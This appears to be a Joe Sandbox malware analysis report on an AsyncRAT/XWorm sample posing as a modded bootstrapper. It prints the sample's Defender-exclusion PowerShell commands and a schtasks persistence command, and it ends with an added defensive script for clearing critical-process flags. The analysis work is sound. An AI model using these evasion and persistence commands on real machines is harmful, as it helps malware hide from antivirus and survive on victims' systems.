Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000002.00000002.2621953796.0000000003081000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000002.00000000.1363070453.0000000000DF2000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000002.00000000.1363070453.0000000000DF2000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000002.00000000.1363070453.0000000000DF2000.00000002.00000001.01000000.00000006.sdmp, Author: ditekSHen
• Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Roaming\not rat.exe, Author: Joe Security
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\not rat.exe, Author: Joe Security
• Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\not rat.exe, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\not rat.exe, Author: ditekSHen
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 92%, ReversingLabs
Reputation: low
Has exited: false

Target ID: 3
Start time: 14:07:57
Start date: 01/12/2024
Path: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe"
Imagebase: 0x22ec9d70000
File size: 730'112 bytes
MD5 hash: EDBE7F367BE35F4D0702F81FC432C9EC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 75%, ReversingLabs
Reputation: low
Has exited: true

Target ID: 4
Start time: 14:07:57
Start date: 01/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6ee680000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 5
Start time: 14:08:02
Start date: 01/12/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\not rat.exe'
Imagebase: 0x7ff6cb6b0000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 6
Start time: 14:08:02
Start date: 01/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6ee680000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 8
Start time: 14:08:09
Start date: 01/12/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'not rat.exe'
Imagebase: 0x7ff6cb6b0000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

                                                                                                                                                                                                                                            Target ID:9
                                                                                                                                                                                                                                            Start time:14:08:09
                                                                                                                                                                                                                                            Start date:01/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:10
                                                                                                                                                                                                                                            Start time:14:08:11
                                                                                                                                                                                                                                            Start date:01/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                                                                                                            Imagebase:0x7ff67e6d0000
                                                                                                                                                                                                                                            File size:55'320 bytes
                                                                                                                                                                                                                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                            Target ID:11
                                                                                                                                                                                                                                            Start time:14:08:11
                                                                                                                                                                                                                                            Start date:01/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\WerFault.exe -pss -s 444 -p 7424 -ip 7424
                                                                                                                                                                                                                                            Imagebase:0x7ff76aaf0000
                                                                                                                                                                                                                                            File size:570'736 bytes
                                                                                                                                                                                                                                            MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:12
                                                                                                                                                                                                                                            Start time:14:08:12
                                                                                                                                                                                                                                            Start date:01/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\WerFault.exe -u -p 7424 -s 2180
                                                                                                                                                                                                                                            Imagebase:0x7ff76aaf0000
                                                                                                                                                                                                                                            File size:570'736 bytes
                                                                                                                                                                                                                                            MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:14
                                                                                                                                                                                                                                            Start time:14:08:16
                                                                                                                                                                                                                                            Start date:01/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                                                                                                                            Imagebase:0x7ff67e6d0000
                                                                                                                                                                                                                                            File size:55'320 bytes
                                                                                                                                                                                                                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                            Target ID:17
                                                                                                                                                                                                                                            Start time:14:08:24
                                                                                                                                                                                                                                            Start date:01/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
                                                                                                                                                                                                                                            Imagebase:0x7ff6cb6b0000
                                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:18
                                                                                                                                                                                                                                            Start time:14:08:24
                                                                                                                                                                                                                                            Start date:01/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:19
                                                                                                                                                                                                                                            Start time:14:08:47
                                                                                                                                                                                                                                            Start date:01/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
                                                                                                                                                                                                                                            Imagebase:0x7ff6cb6b0000
                                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:20
                                                                                                                                                                                                                                            Start time:14:08:47
                                                                                                                                                                                                                                            Start date:01/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6ee680000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 23
Start time: 14:09:12
Start date: 01/12/2024
Path: C:\Windows\System32\schtasks.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe"
Imagebase: 0x7ff7b7180000
File size: 235'008 bytes
MD5 hash: 76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 24
Start time: 14:09:12
Start date: 01/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6ee680000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 25
Start time: 14:09:13
Start date: 01/12/2024
Path: C:\Users\user\AppData\Roaming\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Users\user\AppData\Roaming\svchost.exe
Imagebase: 0x5e0000
File size: 42'496 bytes
MD5 hash: 270675071F6FA1DFAA122B58BC45D9AB
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
• Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: ditekSHen
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 92%, ReversingLabs
Has exited: true

Target ID: 26
Start time: 14:09:23
Start date: 01/12/2024
Path: C:\Users\user\AppData\Roaming\svchost.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\AppData\Roaming\svchost.exe"
Imagebase: 0xa20000
File size: 42'496 bytes
MD5 hash: 270675071F6FA1DFAA122B58BC45D9AB
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 27
Start time: 14:09:32
Start date: 01/12/2024
Path: C:\Users\user\AppData\Roaming\svchost.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\AppData\Roaming\svchost.exe"
Imagebase: 0x670000
File size: 42'496 bytes
MD5 hash: 270675071F6FA1DFAA122B58BC45D9AB
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 29
Start time: 14:10:01
Start date: 01/12/2024
Path: C:\Users\user\AppData\Roaming\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Users\user\AppData\Roaming\svchost.exe
Imagebase: 0xf60000
File size: 42'496 bytes
MD5 hash: 270675071F6FA1DFAA122B58BC45D9AB
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false
                                                                                                                                                                                                                                            Reset < >
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1367211360.00007FFB4B0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0F0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb4b0f0000_sDKRz09zM7.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 5a25711f126be09ae0231a2768c2df06c5b5164377e583a0a07f5d936343a8fe
                                                                                                                                                                                                                                              • Instruction ID: 651b0e9de487da320764aa9774b3cd363e0dfcd0780130017b5e253fd17132ed
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5a25711f126be09ae0231a2768c2df06c5b5164377e583a0a07f5d936343a8fe
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DE315461B1DA8D4FE785EB788C596B87BE1EF99301B4400BBD44DC32A3DE689C458741
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1367211360.00007FFB4B0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0F0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb4b0f0000_sDKRz09zM7.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 3fd540ec49a93e90793bc61b4e4c8a0b9335557da11c13f79837ef96129a147d
                                                                                                                                                                                                                                              • Instruction ID: 4d6f60c674eb60b1d771be599225c9febf8a1a4adace0643b5c789491f3f0684
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3fd540ec49a93e90793bc61b4e4c8a0b9335557da11c13f79837ef96129a147d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B1715D70A199098FEB98EF38C598B6DB7E2EF54315F104269E15AD32E1DF78AC42C740
Memory Dump Source
• Source File: 00000000.00000002.1367211360.00007FFB4B0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffb4b0f0000_sDKRz09zM7.jbxd

Execution Graph

Execution Coverage: 23.5%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 17.6%
Total number of Nodes: 17
Total number of Limit Nodes: 0

execution_graph (node id, address, API called, successor nodes):
• 4366 7ffb4b0f9798 -> 4367
• 4367 7ffb4b0f97a1 SetWindowsHookExW -> 4369
• 4369 7ffb4b0f9871
• 4354 7ffb4b0f7631 -> 4355
• 4355 7ffb4b0f764f CheckRemoteDebuggerPresent -> 4357
• 4357 7ffb4b0f76ef
• 4370 7ffb4b0f7740 -> 4371
• 4371 7ffb4b0f7749 -> 4374
• 4374 7ffb4b0f7200 -> 4375
• 4375 7ffb4b0f71c8 CheckRemoteDebuggerPresent -> 4377
• 4377 7ffb4b0f76ef
• 4358 7ffb4b0fa46e -> 4359
• 4359 7ffb4b0fa471 -> 4361, 4362
• 4361 7ffb4b0fa619
• 4362 7ffb4b0f9288 -> 4363
• 4363 7ffb4b0f9291 RtlSetProcessIsCritical -> 4365
• 4365 7ffb4b0f9352 -> 4361

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000002.00000002.2638983025.00007FFB4B0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffb4b0f0000_not rat.jbxd
• String ID: M_H
• API String ID: 0-1939843538

Control-flow Graph

control_flow_graph (basic block id, address range, API called, successor blocks):
• 124 7ffb4b0f7200-7ffb4b0f7218 -> 126, 127
• 126 7ffb4b0f721a-7ffb4b0f722f -> 129
• 127 7ffb4b0f71c8-7ffb4b0f71cb -> 129
• 129 7ffb4b0f7650-7ffb4b0f76ed CheckRemoteDebuggerPresent -> 133, 134
• 133 7ffb4b0f76f5-7ffb4b0f7738
• 134 7ffb4b0f76ef -> 133

Control-flow Graph

407->415 416 7ffb4b0f611f-7ffb4b0f6133 407->416 408->407 415->416
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.2638983025.00007FFB4B0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0F0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffb4b0f0000_not rat.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 26426ede08f505f688054c9afce5e003648a8a9d6d755c6ad5aca1dbf0305f0c
                                                                                                                                                                                                                                              • Instruction ID: 6e053cbb341a428128a23deba487b2371ffb00ab5387b91d9b8339fd3eeacd2d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 26426ede08f505f688054c9afce5e003648a8a9d6d755c6ad5aca1dbf0305f0c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FEF1B570A0CA8D8FEBA9EF28C855BE937D1FF54311F04826AE84DC7291DB74D9458B81

Control-flow Graph
• Function range: 7ffb4b0f6a22-7ffb4b0f6eaf
• Basic blocks: 44
• Calls: 7ffb4b0f6eb0 (internal)
Memory Dump Source
• Source File: 00000002.00000002.2638983025.00007FFB4B0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffb4b0f0000_not rat.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c462f089be8dfd9b713b17815f1e2d24d70e29031549a6461f7e62122683d1af
• Instruction ID: 5b034d1222830d27454c75ad51dae4a0da48d97349bf7504a8fb5fcceeab9c2a
• Opcode Fuzzy Hash: c462f089be8dfd9b713b17815f1e2d24d70e29031549a6461f7e62122683d1af
• Instruction Fuzzy Hash: 1CE1C370A0CA4D8FEBA9EF28C855BE977D1EF58311F04826ED84DC7291DE74A941CB81

Control-flow Graph

Memory Dump Source
• Source File: 00000002.00000002.2638983025.00007FFB4B0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffb4b0f0000_not rat.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: afd05d260e52ff434e04c8676e1dfa68eee7dadd5189835840408a272e5f5cdc
• Instruction ID: b94c417c173b5da568a9f9ff5b5af13156cd7f6fbc7125b4e7d5323d252558ed
• Opcode Fuzzy Hash: afd05d260e52ff434e04c8676e1dfa68eee7dadd5189835840408a272e5f5cdc
• Instruction Fuzzy Hash: F7C1A0B1B1CA094FEB99FF38C455A7977D2EF98301F0441B9E54EC33A2DE68A8428741
Memory Dump Source
• Source File: 00000002.00000002.2638983025.00007FFB4B0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffb4b0f0000_not rat.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f0e2bf9951a8b8b82d58506a1812f623d21d04155a21272448efc26bef23f05e
• Instruction ID: 11e032da3994ea94288dbe9419103c097f42af61ddb425c9caa105c9af863237
• Opcode Fuzzy Hash: f0e2bf9951a8b8b82d58506a1812f623d21d04155a21272448efc26bef23f05e
• Instruction Fuzzy Hash: E0512290B1E6C60FD387AB7888646757FE5DF87216B0801FAE0C9C72A3DD484806C346

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2638983025.00007FFB4B0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffb4b0f0000_not rat.jbxd
Similarity
• API ID: HookWindows
• String ID: I
• API String ID: 2559412058-3707901625
• Opcode ID: c1955d8bf54e21088d54ccfb7e34cf4c290cd1a0692783467db1a7a2b7b444e9
• Instruction ID: d4151b16ef87ceff1b557feba3b4c615fdd2512d7c3800b159a77d7394db8f96
• Opcode Fuzzy Hash: c1955d8bf54e21088d54ccfb7e34cf4c290cd1a0692783467db1a7a2b7b444e9
• Instruction Fuzzy Hash: 8C411770A1CA498FDB19EF68D8466F97BE1EF65315F00427FD049C3292CA65A816C7C1

Control-flow Graph
• Function range: 7ffb4b0f9278-7ffb4b0f9286
• Basic blocks: 2
• Calls: none shown in the graph
APIs
Memory Dump Source
• Source File: 00000002.00000002.2638983025.00007FFB4B0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffb4b0f0000_not rat.jbxd
Similarity
• API ID: CriticalProcess
• String ID:
• API String ID: 2695349919-0
• Opcode ID: ec31d14317830cb5aa9f49a72c57a8d949fdbfe3a80415f103ce06cc95fded8a
• Instruction ID: 8a75e8479cb21dca3355221969be58f1d61f6815029f36485d1f6375a5a6d04c
• Opcode Fuzzy Hash: ec31d14317830cb5aa9f49a72c57a8d949fdbfe3a80415f103ce06cc95fded8a
• Instruction Fuzzy Hash: E441D27190CB488FDB69DFA8D845AE97BE0FF65311F04412EE08AD3292DB74A846C791

Control-flow Graph
• Function range: 7ffb4b0f7631-7ffb4b0f7738
• Basic blocks: 3
• Calls: CheckRemoteDebuggerPresent
APIs
Memory Dump Source
• Source File: 00000002.00000002.2638983025.00007FFB4B0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffb4b0f0000_not rat.jbxd
Similarity
• API ID: CheckDebuggerPresentRemote
• String ID:
• API String ID: 3662101638-0
• Opcode ID: 496578133cfce1a1a94855625853a7e7765263995bac2ff74d89b9097a559553
• Instruction ID: 18cad1c344deeb885dbe3e4b3cbc790f5704961bfdca2665d564cd937c9256e5
• Opcode Fuzzy Hash: 496578133cfce1a1a94855625853a7e7765263995bac2ff74d89b9097a559553
• Instruction Fuzzy Hash: 8931237190875C8FCB58DF68C88A7E97BE0FF65311F0442AAD489D7282DB34A842CB91

Control-flow Graph (graph image not reproduced; node and edge list recovered from the report)
• Node 145: 7ffb4b0f9288-7ffb4b0f9350, calls RtlSetProcessIsCritical; branches to nodes 150 and 151
• Node 151: 7ffb4b0f9352, falls through to node 150
• Node 150: 7ffb4b0f9358-7ffb4b0f938d
APIs
Memory Dump Source
• Source File: 00000002.00000002.2638983025.00007FFB4B0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffb4b0f0000_not rat.jbxd
Similarity
• API ID: CriticalProcess
• String ID:
• API String ID: 2695349919-0
• Opcode ID: 99e32ce2308d239716187e6fc1fcf8c1e96e7a3615886cbca36fd459636f5531
• Instruction ID: 2f3e773edbd62206cb0fa9b073388b82c592ac9f94bae425724d473205a838e0
• Opcode Fuzzy Hash: 99e32ce2308d239716187e6fc1fcf8c1e96e7a3615886cbca36fd459636f5531
• Instruction Fuzzy Hash: EA31E47190CB588FDB28DF58D8456E97BE0FF65311F04412EE08AD3692DB746846CB91
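The function above calls RtlSetProcessIsCritical, which sets the process's BreakOnTermination flag (the "Protects its processes via BreakOnTermination flag" signature in this report). Killing a process with that flag set bugchecks the host, so a responder needs to find such processes and clear the flag before terminating them. The PowerShell below is an added example written for this page, not code from the Joe Sandbox report or from the sample; it assumes an elevated Windows 10/11 session (SeDebugPrivilege), the documented NtQueryInformationProcess/NtSetInformationProcess signatures, the PROCESSINFOCLASS value ProcessBreakOnTermination = 29, and the standard PROCESS_QUERY_INFORMATION (0x0400) and PROCESS_SET_INFORMATION (0x0200) access masks.

```powershell
# Added example, not part of the Joe Sandbox report.
# Lists processes whose BreakOnTermination flag is set (what RtlSetProcessIsCritical(TRUE, ...)
# produces) and can clear the flag so the process can be killed without a bugcheck.
# Assumptions: elevated session; constants below are from the public PROCESSINFOCLASS / access-mask definitions.

if (-not ('ProcInfo' -as [type])) {
    Add-Type -TypeDefinition @"
using System;
using System.Runtime.InteropServices;
public static class ProcInfo {
    [DllImport("ntdll.dll")]
    public static extern int NtQueryInformationProcess(IntPtr hProcess, int infoClass,
        out uint info, int infoLength, out int returnLength);
    [DllImport("ntdll.dll")]
    public static extern int NtSetInformationProcess(IntPtr hProcess, int infoClass,
        ref uint info, int infoLength);
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern IntPtr OpenProcess(uint access, bool inherit, int pid);
    [DllImport("kernel32.dll")]
    public static extern bool CloseHandle(IntPtr h);
}
"@
}

$ProcessBreakOnTermination = 29       # PROCESSINFOCLASS::ProcessBreakOnTermination
$PROCESS_QUERY_INFORMATION = 0x0400
$PROCESS_SET_INFORMATION   = 0x0200

function Get-CriticalProcess {
    # Returns Id/Name of every process whose BreakOnTermination flag is non-zero.
    foreach ($p in Get-Process) {
        $h = [ProcInfo]::OpenProcess($PROCESS_QUERY_INFORMATION, $false, $p.Id)
        if ($h -eq [IntPtr]::Zero) { continue }     # protected process or access denied; skip
        try {
            $flag = [uint32]0; $len = [int]0
            $status = [ProcInfo]::NtQueryInformationProcess($h, $ProcessBreakOnTermination,
                                                           [ref]$flag, 4, [ref]$len)
            if ($status -eq 0 -and $flag -ne 0) {
                [pscustomobject]@{ Id = $p.Id; Name = $p.ProcessName }
            }
        } finally { [void][ProcInfo]::CloseHandle($h) }
    }
}

function Clear-CriticalFlag {
    param([Parameter(Mandatory)][int]$ProcessId)
    # Sets BreakOnTermination back to 0 so Stop-Process / taskkill no longer bugchecks the host.
    $h = [ProcInfo]::OpenProcess($PROCESS_SET_INFORMATION, $false, $ProcessId)
    if ($h -eq [IntPtr]::Zero) {
        throw "OpenProcess($ProcessId) failed, Win32 error $([Runtime.InteropServices.Marshal]::GetLastWin32Error())"
    }
    try {
        $zero = [uint32]0
        $status = [ProcInfo]::NtSetInformationProcess($h, $ProcessBreakOnTermination, [ref]$zero, 4)
        if ($status -ne 0) { throw ("NtSetInformationProcess failed: NTSTATUS 0x{0:X8}" -f $status) }
    } finally { [void][ProcInfo]::CloseHandle($h) }
}

# Usage: enumerate first, then clear and kill only the suspect entry.
# csrss, smss, wininit and services are critical by design and must be left alone;
# a process with a system binary's name running outside System32 (a pattern this
# report flags) is the kind of entry to neutralise.
Get-CriticalProcess | Format-Table -AutoSize
# Clear-CriticalFlag -ProcessId <pid>; Stop-Process -Id <pid> -Force
```

Expect the well-known Windows system processes in the output on a clean host; the point of the check is any additional entry, which is then handled with Clear-CriticalFlag before Stop-Process.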
Strings
Memory Dump Source
